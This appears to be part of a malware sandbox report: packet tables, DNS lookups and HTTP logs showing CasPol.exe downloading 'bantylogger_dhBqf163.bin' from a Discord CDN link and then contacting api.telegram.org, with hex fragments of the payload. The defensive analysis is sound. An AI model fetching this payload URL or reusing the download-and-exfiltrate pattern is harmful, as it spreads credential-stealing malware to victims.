                                                                                                                        Aug 5, 2022 05:05:18.869085073 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869108915 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869304895 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869385004 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869481087 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869514942 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869600058 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869673014 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869694948 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869708061 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869729996 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869880915 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869895935 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869910002 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.869978905 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870157003 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870218039 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870238066 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870250940 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870273113 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870440006 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870501041 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870524883 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870548964 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870572090 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870764017 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870800972 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.870953083 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.870987892 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.871057034 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.871153116 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.871292114 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.871558905 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.871598005 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.871851921 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.875514984 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.875750065 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.875762939 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.875802040 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.875951052 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.875973940 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.876080990 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.876260996 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.876359940 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.876379013 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.876404047 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.876432896 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.876663923 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.880383015 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.880599976 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.880805969 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.881025076 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.881050110 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.881069899 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.881365061 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.881582022 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.881858110 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.882080078 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882107973 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882123947 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882200956 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.882421970 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882463932 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.882500887 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882519007 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882539988 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.882796049 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.882875919 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883043051 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883176088 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883199930 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883210897 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883235931 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883394003 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883467913 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883491039 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883514881 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883661032 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883697033 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883709908 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883837938 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883869886 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.883908987 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.883982897 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884119987 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.884141922 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884329081 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884488106 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.884512901 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884583950 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884740114 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.884776115 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884933949 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.884964943 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.884974957 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885042906 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885111094 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885279894 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885349989 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885384083 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885392904 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885576963 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885632992 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885657072 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885680914 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885829926 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.885893106 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885921955 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885936975 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.885957956 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.886075020 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886100054 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886168003 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.886256933 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886292934 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.886384010 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.886432886 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886626005 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886645079 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886656046 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886665106 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.886687040 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.886990070 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.887033939 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.887077093 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.887084961 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.887375116 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:06:58.645401001 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.645482063 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.645670891 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.651556015 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.651616096 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.715867043 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.716109037 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.718507051 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.718559980 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.719218016 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.742728949 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.761733055 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.762680054 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.806504011 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.821204901 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.821346998 CEST44349795149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.821520090 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:06:58.824018002 CEST49795443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.127244949 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.127309084 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.127562046 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.127933979 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.127955914 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.168003082 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.170190096 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.170212984 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.207477093 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.208734989 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.208755970 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.208766937 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.208776951 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.208813906 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.208822012 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.209059954 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.209074974 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.209198952 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.209208012 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.326499939 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.326726913 CEST44349796149.154.167.220192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:01.326888084 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:01.327471018 CEST49796443192.168.11.20149.154.167.220
                                                                                                                        Aug 5, 2022 05:07:08.522363901 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:07:08.531848907 CEST8049782162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:07:08.532033920 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Aug 5, 2022 05:05:18.564472914 CEST5842853192.168.11.201.1.1.1
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST53584281.1.1.1192.168.11.20
                                                                                                                        Aug 5, 2022 05:06:58.629198074 CEST5338453192.168.11.201.1.1.1
                                                                                                                        Aug 5, 2022 05:06:58.638317108 CEST53533841.1.1.1192.168.11.20
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Aug 5, 2022 05:05:18.564472914 CEST192.168.11.201.1.1.10x61beStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:06:58.629198074 CEST192.168.11.201.1.1.10xf4dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST1.1.1.1192.168.11.200x61beNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST1.1.1.1192.168.11.200x61beNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST1.1.1.1192.168.11.200x61beNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST1.1.1.1192.168.11.200x61beNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:05:18.574004889 CEST1.1.1.1192.168.11.200x61beNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Aug 5, 2022 05:06:58.638317108 CEST1.1.1.1192.168.11.200xf4dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                        • cdn.discordapp.com
                                                                                                                        • api.telegram.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.11.2049783162.159.129.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.11.2049795149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.11.2049796149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.11.2049782162.159.129.23380C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Aug 5, 2022 05:05:18.598622084 CEST64OUTGET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Host: cdn.discordapp.com
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Aug 5, 2022 05:05:18.616050005 CEST65INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Fri, 05 Aug 2022 03:05:18 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Fri, 05 Aug 2022 04:05:18 GMT
                                                                                                                        Location: https://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dou%2BQ4ngl1EKjZbFYNmczXKMXRb6utxA2VFiFlbMThlU0KBpokkdoUGCSVAbMBjTVZVhuIsHl6HBdog42nucdxp3dCWxJoMfqCovsI51i9BXWCvz1oefZ%2Bg7IvQ0Uxx46%2B2E1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 735c4f734fe09957-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.11.2049783162.159.129.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2022-08-05 03:05:18 UTC0OUTGET /attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: cdn.discordapp.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2022-08-05 03:05:18 UTC0INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 05 Aug 2022 03:05:18 GMT
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        Content-Length: 222272
                                                                                                                        Connection: close
                                                                                                                        CF-Ray: 735c4f74ad6d9bce-FRA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Age: 92033
                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                        Content-Disposition: attachment;%20filename=bantylogger_dhBqf163.bin, attachment
                                                                                                                        ETag: "c1891d8aabda6f2923ecb6efc37a0851"
                                                                                                                        Expires: Sat, 05 Aug 2023 03:05:18 GMT
                                                                                                                        Last-Modified: Thu, 04 Aug 2022 00:20:25 GMT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                        x-goog-generation: 1659572425082079
                                                                                                                        x-goog-hash: crc32c=jVTtDA==
                                                                                                                        x-goog-hash: md5=wYkdiqvabykj7Lbvw3oIUQ==
                                                                                                                        x-goog-metageneration: 1
                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                        x-goog-stored-content-length: 222272
                                                                                                                        X-GUploader-UploadID: ADPycdtf-K5_PSmv1CZSpRbciL2rp9P2BwJq8YDQTC8u_rEu83zYNc4TthlwF9uG7tW_KFRxxWoJHDseZjiljAfM6Ac4P0n2juxn
                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ycUg0jMipuzxWCsUB5ah5%2FEn4mMbBBySuu212fRcH%2BaC1CrBm7tRFKRFpL%2FUsDPZzr5bBAs3j5DuTp2EVJxoLamu7FoRYC3BFS9JJR4%2BYUNZkgo%2Bxe0f4pQWcUCxWBJhIguOlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        2022-08-05 03:05:18 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                        Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                        2022-08-05 03:05:18 UTC1INData Raw: 1b 68 1b b8 62 6a 98 8f 32 c3 38 b2 5c d9 ed f3 56 9c 75 02 1d 29 cf 18 77 5b d4 00 32 44 42 e3 d0 c9 94 ed a6 cb 76 34 1e 43 be 75 87 9b c3 9e df e5 95 c8 09 f5 75 98 aa 2b a5 91 04 92 f2 38 47 44 84 1a 12 73 c8 09 92 55 65 6b a5 9e 3a dd 93 8b 75 e7 d4 4d 25 50 58 6e 6d 3a 46 11 67 12 a8 6c 89 16 8d f2 b7 e9 27 37 58 e3 34 7d bd f7 ea fb 9a b2 52 2f d2 21 9f e2 3c 5f 33 09 2d e6 ef 5d 51 04 95 4f 30 56 0e e3 b9 dd 9c 3f 23 a9 ed 88 a9 5e 81 3e bc b7 d7 bf 7d 6e 63 97 46 78 82 b3 01 4e 5e 13 44 f2 b5 a3 00 77 cf 82 59 e6 ef d5 bf bc af 14 9a 4b 83 e2 da f8 2a ed f9 cc f7 d2 f6 d7 a0 13 a7 62 ab 8b 5e c9 62 d7 82 fc fc 14 74 34 4d 11 c1 85 e0 b4 39 b7 41 ee 1a c6 ad 38 f1 ce df a4 5a 11 60 a4 a6 06 c7 8e ac 2f 94 d4 82 2c 16 c2 b9 0f 1c b5 83 2d 6c a3 a6
                                                                                                                        Data Ascii: hbj28\Vu)w[2DBv4Cuu+8GDsUek:uM%PXnm:Fgl'7X4}R/!<_3-]QO0V?#^>}ncFxN^DwYK*b^bt4M9A8Z`/,-l
                                                                                                                        2022-08-05 03:05:18 UTC3INData Raw: a7 52 07 69 db 2d 30 b0 74 8e f5 4f e5 ba 7e ad fa ae 13 8a c2 bf 4e 86 d0 55 f6 19 52 cc 95 ab 5f 85 b9 aa dc ed 11 0d 9d b2 2f 26 cd 25 9b 52 5a 05 39 25 a6 ad 43 1c 39 c3 57 10 f8 00 09 86 5f 02 69 b9 5b 87 03 58 a7 b5 6b 6d 5a 55 2e 37 4c 37 80 72 00 34 54 17 52 5f 53 53 ab 2b 1f 4b 28 43 45 83 cc d2 d0 fd a9 06 ce da 9f 27 29 e1 97 ba e3 71 34 f7 6b 3f 55 4c e2 9e 01 50 ef b8 37 39 77 37 70 61 c6 be 7e 10 66 fa 18 19 f6 56 f0 69 53 29 d2 59 0f f0 43 bc 31 b1 eb d6 a1 6a 7e b1 d3 57 82 0d 4b d7 11 c8 0f 0d 61 bb d7 bc 12 18 81 85 7f 9b 56 cf ec 75 03 2e 19 66 46 c7 92 7a 6a 5a d8 3c 40 b5 fb a5 11 ab ae 9f 30 d1 a6 8e 94 38 ac c9 89 e9 53 0f 51 ee f0 44 05 56 e6 52 65 9e 9f 2b d2 27 5a 1d 86 5d ba fc c1 e3 46 2e c4 3b 03 44 3e ee 40 eb 92 1c c2 2f 50
                                                                                                                        Data Ascii: Ri-0tO~NUR_/&%RZ9%C9W_i[XkmZU.7L7r4TR_SS+K(CE')q4k?ULP79w7pa~fViS)YC1j~WKaVu.fFzjZ<@08SQDVRe+'Z]F.;D>@/P
                                                                                                                        2022-08-05 03:05:18 UTC4INData Raw: e7 d4 49 0d 61 18 6e 67 16 0f 6f 68 12 a8 68 a1 27 8d f2 bd c5 3c 49 57 e3 34 79 95 ce ea fb 90 6c 5d 0a fa 16 9f e2 36 4c b7 21 15 e6 e1 48 35 0a eb e8 39 9b 2b 25 b7 91 51 1a 60 e9 be fb 89 24 8d 40 db c5 b2 fe 56 73 0d f9 28 13 ea bb 58 2b 7e 6b ef 90 bd fd 6e 57 81 e5 32 c6 82 b0 05 d9 ff 25 97 41 ad ca 9d fa 2a eb ee a3 9a 97 f6 dd ff 17 b5 67 92 8e bf a8 64 a9 8d fc fc 10 1b 0a ad 11 c9 fa d7 b5 32 bd 69 fd 1b c6 ab 27 9e f3 df a4 50 02 18 cd a3 2a a6 b1 a0 a2 bf d4 82 2d 05 cd e8 00 0a 8d 1f 3c 63 b6 b0 1a 9f 0e 64 93 17 0c 32 a2 5c bb ae 26 7f de c4 6f 86 75 13 13 da ef 5a 5b 90 12 c2 2e 50 c4 58 4e 10 15 42 d6 d1 63 0f f7 79 c4 51 c9 f3 d4 1b 97 86 f5 e4 19 f4 c0 f2 63 6a 61 c4 5c 4a 18 83 76 58 b0 1f 5c e6 80 05 e9 c5 5a 09 94 70 c7 43 5b cf f3
                                                                                                                        Data Ascii: Iangohh'<IW4yl]6L!H59+%Q`$@Vs(X+~knW2%A*gd2i'P*-<cd2\&ouZ[.PXNBcyQcja\JvX\ZpC[
